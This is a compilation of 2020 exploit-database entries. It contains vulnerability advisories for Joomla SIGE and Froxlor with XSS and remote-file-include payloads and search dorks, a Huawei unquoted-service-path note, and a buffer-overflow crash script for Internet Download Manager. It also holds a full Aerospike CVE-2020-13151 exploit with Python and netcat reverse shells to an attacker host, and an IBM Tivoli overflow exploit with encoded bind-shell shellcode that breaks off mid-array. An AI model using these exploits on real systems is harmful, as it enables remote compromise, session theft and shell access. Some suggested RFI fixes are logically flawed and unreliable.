deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Joomla Plugin Simple Image Gallery Extended (SIGE) 3.5.3 - Multiple Vulnerabilities
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-11
# Vendor Homepage: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Software Link: https://kubik-rubik.de/sige-simple-image-gallery-extended
# Version: 3.5.3
Document Title:
===============
SIGE (Joomla) 3.4.1 & 3.5.3 Pro - Multiple Vulnerabilities
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2265
Release Date:
=============
2020-11-11
Vulnerability Laboratory ID (VL-ID):
====================================
2265
Common Vulnerability Scoring System:
====================================
7.8
Vulnerability Class:
====================
Multiple
Current Estimated Price:
========================
2.000€ - 3.000€
Product & Service Introduction:
===============================
It offers numerous opportunities to present pictures quickly and easily
in articles. The unique feature of the plugin is
that you can control any parameter on the syntax call. Editor Button -
SIGE Parameters: With the button, you can set the
parameters very easy on-the-fly in an article. It is an excellent
addition to SIGE. Highlights are: parameter call, watermark
function, read IPTC data, thumbnail storage, crop function, sort by
modification date, output as a list, CSS Image Tooltip,
Editor Button SIGE Parameter and much more. In version 1.7-2, SIGE was
rewritten entirely and equipped with numerous innovations.
The absolute highlight is the turbo mode. This feature doesn't exist in
any other plugin for Joomla!. In Turbo Mode 2 text files
are created from the HTML output of the gallery and loaded in successive
runs. This feature eliminates the tedious editing
process of each image. In a test with 50 large images, the creation of a
gallery with all the extra features (save thumbnails,
watermark generation, resize original images, etc.) without turbo mode
lasted approximately 17 seconds. In turbo mode, it only
took 1 second, and the gallery on the same scale was available! For
calling the syntaxes, additionally, an Editor Button has
been programmed. It makes it very easy to choose the required syntax,
showing all the settings and parameters of the plugin.
It is a great enrichment in using the SIGE plugin.
(Copy of the Homepage:
https://kubik-rubik.de/sige-simple-image-gallery-extended )
(Software: https://kubik-rubik.de/sige-simple-image-gallery-extended ;
https://kubik-rubik.de/downloads/sige-simple-image-gallery-extended ;
https://extensions.joomla.org/extension/photos-a-images/galleries/sige/ )
Abstract Advisory Information:
==============================
An independent vulnerability laboratory researcher discovered multiple
web vulnerabilities in the Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
Affected Product(s):
====================
Vendor:
Product: Simple Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 Pro -
Joomla Extension (Web-Application)
Vulnerability Disclosure Timeline:
==================================
2020-11-10: Researcher Notification & Coordination (Security Researcher)
2020-11-11: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Authentication Type:
====================
Open Authentication (Anonymous Privileges)
User Interaction:
=================
No User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
1.1
A file include vulnerability has been discovered in the official Simple
Image Gallery Extended (SIGE) v3.4.1 & v3.5.3 pro extension for joomla.
The web vulnerability allows remote attackers to unauthorized upload
web-shells or malicious contents to compromise the local file-system.
The vulnerability is located in the img parameter of the print.php file.
Remote attackers are able to upload images to the unrestricted assets
path to compromise the web-applications file-system and involved
database management system. Exploitation requires no user interaction
and only
a low privileged user account to upload images.
1.2
Multiple non-persistent cross site web vulnerabilities has been
discovered in the official Simple Image Gallery Extended (SIGE) v3.4.1 &
v3.5.3 pro extension for joomla.
The vulnerability allows remote attackers to inject own malicious script
codes with non-persistent attack vector to compromise browser to
web-application requests from the client-side.
The non-persistent cross site scripting web vulnerabilities are located
in the `name` and `title` parameters of the `print.php` file.
Remote attackers without user or guest privileges are able to make own
malicious special crafted links to compromise client-side
GET method requests. The attack vector is non-persistent and the issue
affects the client-side.
Successful exploitation of the vulnerabilities results in session
hijacking, non-persistent phishing attacks, non-persistent
external redirects to malicious source and non-persistent client-side
manipulation of affected application modules.
Proof of Concept (PoC):
=======================
1.1
The remote file include web vulnerability can be exploited by remote
attackers without privileged user account or user interaction.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Exploitation
http://[SERVER/DOMAIN]/[folders]/print.php?img=[RFI
VULNERABILITY!]&name=[NAME]%20title=[TITLE]
1.2
The non-persistent cross site scripting web vulnerability can be
exploited by remote attackers without privileged user account and with
low user interaction.
For security demonstration or to reproduce the persistent cross site web
vulnerability follow the provided information and steps below to continue.
Dork(s):
intext:"Powered by Simple Image Gallery Extended"
intext:"Powered by Simple Image Gallery Extended - Kubik-Rubik.de"
PoC: Payload
"><svg onload=alert()>
'><script>alert('');</script>
<IMG "'"><script>alert()</script>'>
PoC: Example
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NON-PERSISTENT XSS]%20title=[TITLE]
http://[SERVER/DOMAIN]/[folders]/print.php?img=[IMG]&name=[NAME]%20title=[NON-PERSISTENT
XSS]
PoC: Exploitation
http://[SERVER/DOMAIN]/oldsite/plugins/content/sige/plugin_sige/print.php
?img=http://[SERVER/DOMAIN]/assets/public/js/uploading/images/h4shur/h4.gif&name=%22%3E%3Ch1%3Ehacked%20by%20h4shur%3C/h1%3E%22%20title=%22%3E%3Cscript%3Ealert(%27hacked%20by%20h4shur%27)%3C/script%3E
Solution - Fix & Patch:
=======================
1.1
The remote file include vulnerability issue can be resolved by the
following steps ...
Example :
?php
$files=array('test.gif');
if(in_array($_GET['file'], $files)){
include ($_GET['file']);
}
?
* If you are a server administrator, turn off allow_url_fopen from the file
* Or do it with the ini_set command. Only for (RFI)
?php
ini_set('allow_url_fopen ', 'Off');
?
* We can use the strpos command to check that if the address is: //
http, the file will not be enclosed
?php
$strpos = strpos($_GET['url'],'http://');
if(!$strpos){
include($_GET['url']);
}
?
* Using str_replace we can give the given address from two characters
"/", "." Let's clean up
?php
$url=$_GET['url'];
$url = str_replace("/", "", $url);
$url = str_replace(".", "", $url);
include($url);
?
1.2
The client-side cross site scripting vulnerabilities can be resolved by
the following steps ...
1. Encode and escape as parse the name and title parameters
2. Filter the input for special chars and disallow them in parameters
Security Risk:
==============
1.1
The securit risk of the remote file include vulnerability in the img
path of the web-application request is estimated as high.
1.2
The security risk of the non-persistent cross site scripting
vulnerabilities is estimated as medium.
Credits & Authors:
==================
h4shursec - https://www.vulnerability-lab.com/show.php?user=h4shursec
Twitter: @h4shur ; Telegram: @h4shur ; Instagram: @netedit0r
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Huawei LCD_Service 1.0.1.0 - 'LCD_Service' Unquote Service Path
# Date: 2020-11-07
# Exploit Author: Gerardo González
# Vendor Homepage: https://consumer.huawei.com/mx
# Software Link: https://consumer.huawei.com/mx
# Version: 1.0.1.0
# Tested on: Windows 10 Home Single Language x64 Esp
# Step to discover the unquoted Service:
C:\Users\user>wmic service get name, displayname, pathname, startmode | findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
# Service info:
Huawei LCD_Service LCD_Service C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe Auto
C:\Users\gerar>sc qc "LCD_Service"
[SC] QueryServiceConfig CORRECTO
NOMBRE_SERVICIO: LCD_Service
TIPO : 10 WIN32_OWN_PROCESS
TIPO_INICIO : 2 AUTO_START
CONTROL_ERROR : 1 NORMAL
NOMBRE_RUTA_BINARIO: C:\Program Files\Huawei\HwLcdEnhancement\LCD_Service.exe
GRUPO_ORDEN_CARGA :
ETIQUETA : 0
NOMBRE_MOSTRAR : Huawei LCD_Service
DEPENDENCIAS :
NOMBRE_INICIO_SERVICIO: LocalSystem
# A successful attempt would require the local user to be able to insert their code in the system root path
# undetected by the OS or other security applications where it could potentially be executed during
# application startup or reboot. If successful, the local user's code would execute with the elevated
# privileges of the application.
# Exploit Title: Froxlor Froxlor Server Management Panel 0.10.16 - Persistent Cross-Site Scripting
# Exploit Author: Vulnerability-Lab
# Date: 2020-11-12
# Vendor Homepage: https://froxlor.org/
# Software Link: https://froxlor.org/download/
# Version: 0.10.16
Document Title:
===============
Froxlor v0.10.16 CP - (Customer) Persistent Vulnerability
References (Source):
====================
https://www.vulnerability-lab.com/get_content.php?id=2241
Release Date:
=============
2020-11-12
Vulnerability Laboratory ID (VL-ID):
====================================
2241
Common Vulnerability Scoring System:
====================================
5.2
Vulnerability Class:
====================
Cross Site Scripting - Persistent
Current Estimated Price:
========================
1.000€ - 2.000€
Product & Service Introduction:
===============================
Froxlor Server Management Panel, the lightweight server management
software for your needs. Developed by experienced server
administrators, this open source (GPL) panel simplifies the effort of
managing your hosting. Manage reseller ressources and
limit what the customers may use in the dedicated customerpanel. MySQL
management, Directory protection & settings management.
(Copy of the Homepage: https://froxlor.org/index.php &
https://froxlor.org/download/ )
Abstract Advisory Information:
==============================
The vulnerability laboratory core research team discovered a persistent
cross site vulnerability in the Froxlor Server Management Panel v0.10.16.
Affected Product(s):
====================
Froxlor Team
Product: Froxlor v0.10.16 (Stable) - Server Management Panel (Control Panel)
Affected Packages: Gentoo, Debian & Ubuntu
Vulnerability Disclosure Timeline:
==================================
2020-05-01: Researcher Notification & Coordination (Security Researcher)
2020-05-02: Vendor Notification (Security Department)
2020-05-13: Vendor Response/Feedback (Security Department)
2020-10-12: Vendor Fix/Patch (Service Developer Team)
****-**-**: Security Acknowledgements (Security Department)
2020-11-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Authentication Type:
====================
Restricted Authentication (Guest Privileges)
User Interaction:
=================
Low User Interaction
Disclosure Type:
================
Full Disclosure
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in
the Froxlor Server Management Panel v0.10.16 web-application.
The vulnerability allows remote attackers to inject own malicious script
codes with persistent attack vector to compromise browser
to web-application requests from the application-side.
The persistent cross site web vulnerability is located in the
`username`, `name` and `firstname` input fields of the customer
add or registration module. Remote attackers are able to add customers
with malicious script code as firstname or name to
manipulate in the backend the `admin_customers.php` and `customers.php`
files. The injection point is the registration
or customer add/edit module and the execution occurs on preview of the
traffic module in the admin backend. The request
method to inject is POST and the attack vector is persistent located on
the application-side. In a valid attack case the
remote attacker uses a customer or reseller account to inject the
payload as name to provoke an execute in the insecure
backend module.
Successful exploitation of the vulnerability results in session
hijacking, persistent phishing attacks, persistent external
redirects to malicious source and persistent manipulation of affected
application modules.
Request Method(s):
[+] POST
Vulnerable Input(s):
[+] Username
[+] Name
[+] Firstname
Vulnerable Module(s):
[+] Customers
Vulnerable Parameter(s):
[+] name
[+] firstname
Affected File(s):
[+] admin_customers.php
Proof of Concept (PoC):
=======================
The persistent input validation vulnerability can be exploited by remote
attackers with low privilege user account and with low user interaction.
For security demonstration or to reproduce the security web
vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Register or login with a low privilege user account
2. Open the profile account section
3. Change the name and firstname or include in the registration process
Note: Inject test payload to vulnerable marked input fields
4. Save or submit the input via form
5. Wait until an admin or higher privileged user role opens the traffic
stats to execute
6. Successful reproduce of the persistent input validation web
vulnerability!
PoC: Payload (Exploitation)
test%20>"<script alert(document.cookie)></script>div style=1
PoC: Vulnerable Sources (Execution Points) [admin_customers.php or
customers.php to admin_traffic.php via Name & Firstname]
<tr role="row">
<td>>">test%20>"<script alert(document.cookie)></script>div
style=1[MALICIOUS SCRIPT CODE EXECUTION POINT!]
<a
href="admin_customers.php?s=9e20410f4871894db51f11258d5c4b3b&target=traffic&page=customers&action=su&id=2"
rel="external" target="_blank">[Details]</a></td>
<td><small>-</small></td>
</tr><tr role="row">
--- PoC Session Logs [POST] --- (Reseller Account to Admin)
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20
Host: froxlor.localhost:8080
Accept:
text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Content-Type: application/x-www-form-urlencoded
Content-Length: 879
Origin: https://froxlor.localhost:8080
Connection: keep-alive
Referer:
https://froxlor.localhost:8080/admin_customers.php?s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add
Cookie: PHPSESSID=c34ist63ukv1vq9vt5m1hfumpo
s=e3b54c0284e4beca6fd06fed6c86ee20&page=customers&action=add&send=send&
new_loginname=test1%20>"<script alert(document.cookie)></script>div
style=1&createstdsubdomain=0,1&
store_defaultindex=0,1&new_customer_password=KwhyqgzvPo&
new_customer_password_suggestion=KwhyqgzvPo&sendpassword=0,1&def_language=English&api_allowed=0,1&
name=btest%20>"<script alert(document.cookie)></script>div style=1&
firstname=ctest%20>"<script alert(document.cookie)></script>div
style=1&gender=0&
company=&street=&zipcode=&city=&phone=&fax=&email=trest@aol.de&customernumber=&
custom_notes=&custom_notes_show=0&diskspace=0&traffic=0&subdomains=0&emails=0&email_accounts=0&
email_forwarders=0&email_imap=0,1&email_pop3=0,1&ftps=0&mysqls=0&phpenabled=0,1&allowed_phpconfigs[]=1&
perlenabled=0&dnsenabled=0&logviewenabled=0
-
POST: HTTP/2.0 200 OK
server: Apache
vary: Accept-Encoding
content-encoding: gzip
content-length: 1393
content-type: text/html; charset=UTF-8
Reference(s):
https://froxlor.localhost:8080/
https://froxlor.localhost:8080/admin_traffic.php
https://froxlor.localhost:8080/admin_traffic.php?s=[x]&page=customers
Solution - Fix & Patch:
=======================
The vulnerability can be patched by follwing the next steps ...
1. Validate and escape the content of the vulnerable username, name and
firstname input fields
2. Restrict the input fields and disallow specialchars on inputs to filter
3. Parse the two output location and escape or secure encode the content
4. Encode in the edit formular the results on check
Security Risk:
==============
The security risk of the persistent validation web vulnerability in the
web-application is estimated as medium.
Credits & Authors:
==================
Vulnerability-Lab -
https://www.vulnerability-lab.com/show.php?user=Vulnerability-Lab
Benjamin Kunz Mejri -
https://www.vulnerability-lab.com/show.php?user=Benjamin%20K.M.
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without
any warranty. Vulnerability Lab disclaims all warranties,
either expressed or implied, including the warranties of merchantability
and capability for a particular purpose. Vulnerability-Lab
or its suppliers are not liable in any case of damage, including direct,
indirect, incidental, consequential loss of business profits
or special damages, even if Vulnerability-Lab or its suppliers have been
advised of the possibility of such damages. Some states do
not allow the exclusion or limitation of liability for consequential or
incidental damages so the foregoing limitation may not apply.
We do not approve or encourage anybody to break any licenses, policies,
deface websites, hack into databases or trade with stolen data.
Domains: www.vulnerability-lab.com www.vuln-lab.com
www.vulnerability-db.com
Services: magazine.vulnerability-lab.com
paste.vulnerability-db.com infosec.vulnerability-db.com
Social: twitter.com/vuln_lab facebook.com/VulnerabilityLab
youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php
vulnerability-lab.com/rss/rss_upcoming.php
vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php
vulnerability-lab.com/register.php
vulnerability-lab.com/list-of-bug-bounty-programs.php
Any modified copy or reproduction, including partially usages, of this
file requires authorization from Vulnerability Laboratory.
Permission to electronically redistribute this alert in its unmodified
form is granted. All other rights, including the use of other
media, are reserved by Vulnerability-Lab Research Team or its suppliers.
All pictures, texts, advisories, source code, videos and other
information on this website is trademark of vulnerability-lab team & the
specific authors or managers. To record, list, modify, use or
edit our material contact (admin@ or research@) to get a ask permission.
Copyright © 2020 | Vulnerability Laboratory - [Evolution
Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
# Exploit Title: Internet Download Manager 6.38.12 - Scheduler Downloads Scheduler Buffer Overflow (PoC)
# Date: November 18, 2020
# Exploit Author: Vincent Wolterman
# Vendor Homepage: http://www.internetdownloadmanager.com/
# Software Link: http://www.internetdownloadmanager.com/download.html
# Version: 6.38.12
# Tested on: Windows 7 Professional SP 1 Build 7601; Windows 10 Home Build 19041
# Steps to reproduce crash:
# 1) Execute provided Perl code
# 2) Open IDMan_Crash.txt output file
# 3) Copy contents of text file to clipboard
# 4) Open Internet Download Manager 6.38
# 5) From the Menu bar -> Downloads -> Scheduler
# 6) Check the box for 'Open the following file when done:'
# 7) Paste the contents of IDMan_Crash.txt into the input field below
# 8) Click 'Apply' and observe the crash
#!/usr/bin/perl
$baddata = "\x41" x 1302;
$baddata .= "\x42" x 2; # this length overwrites NSEH on Windows 7 Pro SP 1
$baddata .= "\x43"x(5000-length($baddata));
$file = "IDMan_Crash.txt";
open (FILE, '>IDMan_Crash.txt');
print FILE $baddata;
close (FILE);
print "Exploit file created [" . $file . "]\n";
print "Buffer size: " . length($baddata) . "\n";
# Exploit Title: Aerospike Database 5.1.0.3 - OS Command Execution
# Date: 2020-08-01
# Exploit Author: Matt S
# Vendor Homepage: https://www.aerospike.com/
# Version: < 5.1.0.3
# Tested on: Ubuntu 18.04
# CVE : CVE-2020-13151
#!/usr/bin/env python3
import argparse
import random
import os, sys
from time import sleep
import string
# requires aerospike package from pip
import aerospike
# if this isn't installing, make sure os dependencies are met
# sudo apt-get install python-dev
# sudo apt-get install libssl-dev
# sudo apt-get install python-pip
# sudo apt-get install zlib1g-dev
PYTHONSHELL = """python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{ip}",{port}));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'&"""
NETCATSHELL = 'rm /tmp/ft;mkfifo /tmp/ft;cat /tmp/ft|/bin/sh -i 2>&1|nc {ip} {port} >/tmp/ft&'
def _get_client(cfg):
try:
return aerospike.client({
'hosts': [(cfg.ahost, cfg.aport)],
'policies': {'timeout': 8000}}).connect()
except Exception as e:
print(f"unable to access cluster @ {cfg.ahost}:{cfg.aport}\n{e.msg}")
def _send(client, cfg, _cmd):
try:
print(client.apply((cfg.namespace, cfg.setname, cfg.dummystring ), 'poc', 'runCMD', [_cmd]))
except Exception as e:
print(f"[-] UDF execution returned {e.msg}")
def _register_udf(client, cfg):
try:
client.udf_put(cfg.udfpath)
except Exception as e:
print(f"[-] whoops, couldn't register the udf {cfg.udfpath}")
raise e
def _random_string(l):
return ''.join([random.choice(string.ascii_lowercase + string.ascii_uppercase) for i in range(l)])
def _populate_table(client, cfg):
ns = cfg.namespace
setname = cfg.setname
print(f"[+] writing to {ns}.{setname}")
try:
rec = cfg.dummystring
client.put((ns, setname, rec), {'pk':cfg.dummystring})
print(f"[+] wrote {rec}")
except Exception as e:
print(f"[-] unable to write record: {e.msg}")
try:
if e.msg.startswith('Invalid namespace'):
print("Valid namespaces: ")
for n in _info_parse("namespaces", client).split(";"):
print(n.strip())
except:
pass
sys.exit(13)
def _info_parse(k, client):
try:
return [i[1] for i in client.info_all(k).values() ][0]
except Exception as e:
print(f"error retrieving information: {e.msg}")
return []
def _is_vuln(_mj, _mi, _pt, _bd):
fixed = [5,1,0,0]
found = [_mj, _mi, _pt, _bd]
if fixed == found:
return False
for ix, val in enumerate(found):
if val < fixed[ix]:
return True
elif val == fixed[ix]:
pass
else:
return False
def _version_check(client):
print("[+] aerospike build info: ", end="")
try:
_ver = _info_parse("build", client)
print(_ver)
mj, mi, pt, bd = [int(i) for i in _ver.split('.')]
if _is_vuln(mj, mi, pt, bd):
print("[+] looks vulnerable")
return
else:
print(f"[-] this instance is patched.")
sys.exit(0)
except Exception as e:
print(f"[+] unable to interpret build number due to {e}")
print("[+] continuing anyway... ")
def _exploit(cfg):
client = _get_client(cfg)
if not client:
return
_version_check(client)
print(f"[+] populating dummy table.")
_populate_table(client, cfg)
print(f"[+] registering udf")
_register_udf(client, cfg)
if cfg.pythonshell or cfg.netcatshell:
sys.stdout.flush()
print(f"[+] sending payload, make sure you have a listener on {cfg.lhost}:{cfg.lport}", end="")
sys.stdout.flush()
for i in range(4):
print(".", end="")
sys.stdout.flush()
sleep(1)
print(".")
_send(client, cfg, PYTHONSHELL.format(ip=cfg.lhost,port=cfg.lport) if cfg.pythonshell else NETCATSHELL.format(ip=cfg.lhost,port=cfg.lport) )
if cfg.cmd:
print(f"[+] issuing command \"{cfg.cmd}\"")
_send(client, cfg, cfg.cmd)
if __name__ == '__main__':
if len(sys.argv) == 1:
print(f"[+] usage examples:\n{sys.argv[0]} --ahost 10.11.12.13 --pythonshell --lhost=10.0.0.1 --lport=8000")
print("... or ... ")
print(f"{sys.argv[0]} --ahost 10.11.12.13 --cmd 'echo MYPUBKEY > /root/.ssh/authorized_keys'")
sys.exit(0)
parser = argparse.ArgumentParser(description='Aerospike UDF Command Execution - CVE-2020-13151 - POC')
parser.add_argument("--ahost", help="Aerospike host, default 127.0.0.1", default="127.0.0.1")
parser.add_argument("--aport", help="Aerospike port, default 3000", default=3000, type=int)
parser.add_argument("--namespace", help="Namespace in which to create the record set", default="test")
parser.add_argument("--setname", help="Name of set to populate with dummy record(s), default is cve202013151", default=None)
parser.add_argument('--dummystring', help="leave blank for a random value, can use a previously written key to target a specific cluster node", default=None)
parser.add_argument("--pythonshell", help="attempt to use a python reverse shell (requires lhost and lport)", action="store_true")
parser.add_argument("--netcatshell", help="attempt to use a netcat reverse shell (requires lhost and lport)", action="store_true")
parser.add_argument("--lhost", help="host to use for reverse shell callback")
parser.add_argument("--lport", help="port to use for reverse shell callback")
parser.add_argument("--cmd", help="custom command to issue against the underlying host")
parser.add_argument('--udfpath', help="where is the udf to distribute? defaults to `pwd`/poc.lua", default=None)
cfg = parser.parse_args()
if not cfg.setname:
cfg.setname = 'cve202013151'
if not cfg.dummystring:
cfg.dummystring = _random_string(16)
if not cfg.udfpath:
cfg.udfpath = os.path.join(os.getcwd(), 'poc.lua')
assert cfg.cmd or (cfg.lhost and cfg.lport and (cfg.pythonshell or cfg.netcatshell)), "Must specify a command, or a reverse shell + lhost + lport"
if cfg.pythonshell or cfg.netcatshell:
assert cfg.lhost and cfg.lport, "Must specify lhost and lport if using a reverse shell"
_exploit(cfg)
# Exploit Title: IBM Tivoli Storage Manager Command Line Administrative Interface 5.2.0.1 - id' Field Stack Based Buffer Overflow
# Exploit Author: Paolo Stagno aka VoidSec
# Vendor Homepage: https://www.ibm.com/support/knowledgecenter/en/SSGSG7_7.1.0/com.ibm.itsm.tsm.doc/welcome.html
# Version: 5.2.0.1
# Tested on: Windows 10 Pro v.10.0.19041 Build 19041
"""
Usage: IBM Tivoli Storage Manager > in the "id" field paste the content of "IBM_TSM_v.5.2.0.1_exploit.txt" and press "ENTER"
PS C:\Users\user\Desktop> Import-Module .\Get-PESecurity.psm1
PS C:\Users\user\Desktop> Get-PESecurity -file "dsmadmc.exe"
FileName : dsmadmc.exe
ARCH : I386
DotNET : False
ASLR : True
DEP : True
Authenticode : False
StrongNaming : N/A
SafeSEH : False
ControlFlowGuard : False
HighentropyVA : False
"""
# [ buffer ]
# [ 68 byte | EIP | rest of the buffer ]
# ^_ESP
"""
EIP contains normal pattern : 0x33634132 (offset 68)
ESP (0x0019e314) points at offset 72 in normal pattern (length 3928)
JMP ESP Pointers:
0x028039eb : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02803d7b : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x02852c21 : jmp esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fbe3 : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x0289fd2f : call esp | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
0x028823a9 : push esp # ret 0x04 | {PAGE_EXECUTE_READ} [dbghelp.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v6.0.0017.0
"""
#!/usr/bin/python
import struct
# 4000 bytes
buff_max_length=800
eip_offset=68
"""
BAD CHARS: \x00\x08\x09\x0a\x0d\x1a\x1b\x7f
GOOD CHARS:
asciiprint \x20-\x7e
MOD CHARS:
\x00 -> \x20
,-----------------------------------------------.
| Comparison results: |
|-----------------------------------------------|
| 80 81 82 83 84 85 86 87| File
| 3f 3f 2c 9f 2c 2e 2b d8| Memory
80 |88 89 8a 8b 8c 8d 8e 8f 90 91 92 93 94 95 96 97| File
|5e 25 53 3c 4f 3f 5a 3f 3f 60 27 22 22 07 2d 2d| Memory
90 |98 99 9a 9b 9c 9d 9e 9f a0 a1 a2 a3 a4 a5 a6 a7| File
|7e 54 73 3e 6f 3f 7a 59 20 ad 9b 9c 0f 9d dd 15| Memory
a0 |a8 a9 aa ab ac ad ae af b0 b1 b2 b3 b4 b5 b6 b7| File
|22 63 a6 ae aa 2d 72 5f f8 f1 fd 33 27 e6 14 fa| Memory
b0 |b8 b9 ba bb bc bd be bf c0 c1 c2 c3 c4 c5 c6 c7| File
|2c 31 a7 af ac ab 5f a8 41 41 41 41 8e 8f 92 80| Memory
c0 |c8 c9 ca cb cc cd ce cf d0 d1 d2 d3 d4 d5 d6 d7| File
|45 90 45 45 49 49 49 49 44 a5 4f 4f 4f 4f 99 78| Memory
d0 |d8 d9 da db dc dd de df e0 e1 e2 e3 e4 e5 e6 e7| File
|4f 55 55 55 9a 59 5f e1 85 a0 83 61 84 86 91 87| Memory
e0 |e8 e9 ea eb ec ed ee ef f0 f1 f2 f3 f4 f5 f6 f7| File
|8a 82 88 89 8d a1 8c 8b 64 a4 95 a2 93 6f 94 f6| Memory
f0 |f8 f9 fa fb fc fd fe ff | File
|6f 97 a3 96 81 79 5f 98 | Memory
`-----------------------------------------------'
"""
# msfvenom -p windows/shell_bind_tcp -f python -v shellcode -a x86 --platform windows -b "\x00\x08\x09\x0a\x0d\x1a\x1b\x7f" -e x86/alpha_mixed BufferRegister=ESP --smallest
shellcode = b""
shellcode += b"\x54\x59\x49\x49\x49\x49\x49\x49\x49\x49\x49"
shellcode += b"\x49\x49\x49\x49\x49\x49\x49\x37\x51\x5a\x6a"
shellcode += b"\x41\x58\x50\x30\x41\x30\x41\x6b\x41\x41\x51"
shellcode += b"\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"
shellcode += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x78\x59\x78"
shellcode += b"\x6b\x4d\x4b\x6b\x69\x62\x54\x61\x34\x6a\x54"
shellcode += b"\x76\x51\x6a\x72\x6c\x72\x54\x37\x45\x61\x4f"
shellcode += b"\x39\x61\x74\x4e\x6b\x62\x51\x66\x50\x6c\x4b"
shellcode += b"\x53\x46\x34\x4c\x6c\x4b\x32\x56\x35\x4c\x6e"
shellcode += b"\x6b\x67\x36\x37\x78\x6e\x6b\x43\x4e\x51\x30"
shellcode += b"\x4c\x4b\x67\x46\x74\x78\x50\x4f\x72\x38\x42"
shellcode += b"\x55\x6c\x33\x30\x59\x56\x61\x38\x51\x39\x6f"
shellcode += b"\x49\x71\x73\x50\x4e\x6b\x70\x6c\x31\x34\x54"
shellcode += b"\x64\x6e\x6b\x73\x75\x67\x4c\x4e\x6b\x66\x34"
